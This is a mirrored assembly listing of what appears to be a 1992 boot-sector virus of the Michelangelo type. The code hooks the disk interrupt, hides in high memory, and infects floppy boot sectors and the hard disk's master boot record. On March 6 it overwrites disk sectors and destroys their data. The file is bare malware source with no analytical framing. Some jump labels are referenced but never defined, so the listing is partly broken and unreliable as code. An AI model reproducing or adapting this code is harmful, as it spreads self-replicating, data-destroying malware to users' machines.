mirror of
synced 2025-02-11 17:32:03 +00:00
253 lines
5.8 KiB
253 lines
5.8 KiB
PAGE 59,132
;ÛÛ Created: 30-Aug-92 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: none ÛÛ
data_0001e equ 4Ch
data_0002e equ 4Eh
main_ram_size_ equ 413h
data_0003e equ 7C00h ;*
data_0004e equ 7C05h ;*
data_0005e equ 7C0Ah ;*
data_0006e equ 7C0Ch ;*
data_0007e equ 7
data_0008e equ 8
data_0009e equ 0Ah
data_0014e equ 3BEh ;*
data_0015e equ 7C03h ;*
data_0016e equ 0B300h ;*
data_0017e equ 1BEh ;*
data_0018e equ 5000h ;*
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
mang proc far
jmp loc_0007
cmc ; Complement carry
add [bx+si-61h],al
add cl,ds:data_0016e
db 2Eh, 00h,0F0h, 1Eh, 50h, 0Ah
db 0D2h, 75h, 1Bh, 33h,0C0h, 8Eh
db 0D8h,0F6h, 06h, 3Fh, 04h, 01h
db 75h, 10h, 58h, 1Fh, 9Ch, 2Eh
db 0FFh, 1Eh, 0Ah, 00h, 9Ch,0E8h
db 0Bh, 00h, 9Dh,0CAh, 02h, 00h
db 58h, 1Fh, 2Eh,0FFh, 2Eh, 0Ah
db 00h
db 50h, 53h, 51h, 52h, 1Eh, 06h
db 56h, 57h, 0Eh, 1Fh, 0Eh, 07h
db 0BEh, 04h, 00h
mov ax,201h
mov bx,200h
mov cx,1
xor dx,dx ; Zero register
pushf ; Push flags
call dword ptr ds:data_0009e
jnc loc_0003 ; Jump if carry=0
xor ax,ax ; Zero register
pushf ; Push flags
call dword ptr ds:data_0009e
dec si
jnz loc_0002 ; Jump if not zero
jmp short loc_0006
xor si,si ; Zero register
cld ; Clear direction
lodsw ; String [si] to ax
cmp ax,[bx]
jne loc_0004 ; Jump if not equal
lodsw ; String [si] to ax
cmp ax,[bx+2]
je loc_0006 ; Jump if equal
mov ax,301h
mov dh,1
mov cl,3
cmp byte ptr [bx+15h],0FDh
je loc_0005 ; Jump if equal
mov cl,0Eh
mov ds:data_0008e,cx
pushf ; Push flags
call dword ptr ds:data_0009e
jc loc_0006 ; Jump if carry Set
mov si,data_0014e
mov di,1BEh
mov cx,21h
cld ; Clear direction
rep movsw ; Rep when cx >0 Mov [si] to es:[di]
mov ax,301h
xor bx,bx ; Zero register
mov cx,1
xor dx,dx ; Zero register
pushf ; Push flags
call dword ptr ds:data_0009e
pop di
pop si
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
xor ax,ax ; Zero register
mov ds,ax
cli ; Disable interrupts
mov ss,ax
mov ax,7C00h
mov sp,ax
sti ; Enable interrupts
push ds
push ax
mov ax,ds:data_0001e
mov ds:data_0005e,ax
mov ax,ds:data_0002e
mov ds:data_0006e,ax
mov ax,ds:main_ram_size_
dec ax
dec ax
mov ds:main_ram_size_,ax
mov cl,6
shl ax,cl ; Shift w/zeros fill
mov es,ax
mov ds:data_0004e,ax
mov ax,0Eh
mov ds:data_0001e,ax
mov ds:data_0002e,es
mov cx,1BEh
mov si,data_0003e
xor di,di ; Zero register
cld ; Clear direction
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
jmp dword ptr cs:data_0015e
xor ax,ax ; Zero register
mov es,ax
int 13h ; Disk dl=drive a ah=func 00h
; reset disk, al=return status
push cs
pop ds
mov ax,201h
mov bx,data_0003e
mov cx,ds:data_0008e
cmp cx,7
jne loc_0008 ; Jump if not equal
mov dx,80h
int 13h ; Disk dl=drive 0 ah=func 02h
; read sectors to memory es:bx
; al=#,ch=cyl,cl=sectr,dh=head
jmp short loc_0009
mov cx,ds:data_0008e
mov dx,100h
int 13h ; Disk dl=drive a ah=func 02h
; read sectors to memory es:bx
; al=#,ch=cyl,cl=sectr,dh=head
jc loc_0009 ; Jump if carry Set
push cs
pop es
mov ax,201h
mov bx,200h
mov cx,1
mov dx,80h
int 13h ; Disk dl=drive 0 ah=func 02h
; read sectors to memory es:bx
; al=#,ch=cyl,cl=sectr,dh=head
jc loc_0009 ; Jump if carry Set
xor si,si ; Zero register
cld ; Clear direction
lodsw ; String [si] to ax
cmp ax,[bx]
jne loc_0014 ; Jump if not equal
lodsw ; String [si] to ax
cmp ax,[bx+2]
jne loc_0014 ; Jump if not equal
xor cx,cx ; Zero register
mov ah,4
int 1Ah ; Real time clock ah=func 04h
; get date cx=year, dx=mon/day
cmp dx,306h
je loc_0010 ; Jump if equal
retf ; Return far
xor dx,dx ; Zero register
mov cx,1
mov ax,309h
mov si,ds:data_0008e
cmp si,3
je loc_0012 ; Jump if equal
mov al,0Eh
cmp si,0Eh
je loc_0012 ; Jump if equal
mov dl,80h
mov byte ptr ds:data_0007e,4
mov al,11h
mov bx,data_0018e
mov es,bx
int 13h ; Disk dl=drive 0 ah=func 03h
; write sectors from mem es:bx
; al=#,ch=cyl,cl=sectr,dh=head
jnc loc_0013 ; Jump if carry=0
xor ah,ah ; Zero register
int 13h ; Disk dl=drive 0 ah=func 00h
; reset disk, al=return status
inc dh
cmp dh,ds:data_0007e
jb loc_0011 ; Jump if below
xor dh,dh ; Zero register
inc ch
jmp short loc_0011
mov cx,7
mov ds:data_0008e,cx
mov ax,301h
mov dx,80h
int 13h ; Disk dl=drive 0 ah=func 03h
; write sectors from mem es:bx
; al=#,ch=cyl,cl=sectr,dh=head
jc loc_0009 ; Jump if carry Set
mov si,data_0014e
mov di,data_0017e
mov cx,21h
rep movsw ; Rep when cx >0 Mov [si] to es:[di]
mov ax,301h
xor bx,bx ; Zero register
inc cl
int 13h ; Disk dl=drive 0 ah=func 03h
; write sectors from mem es:bx
; al=#,ch=cyl,cl=sectr,dh=head
jmp short loc_0009
db 16 dup (0)
db 0Ah, 'Replace and press any key w'
db 'hen ready', 0Dh, 0Ah, 0
db 00h, 00h, 55h,0AAh
mang endp
seg_a ends
end start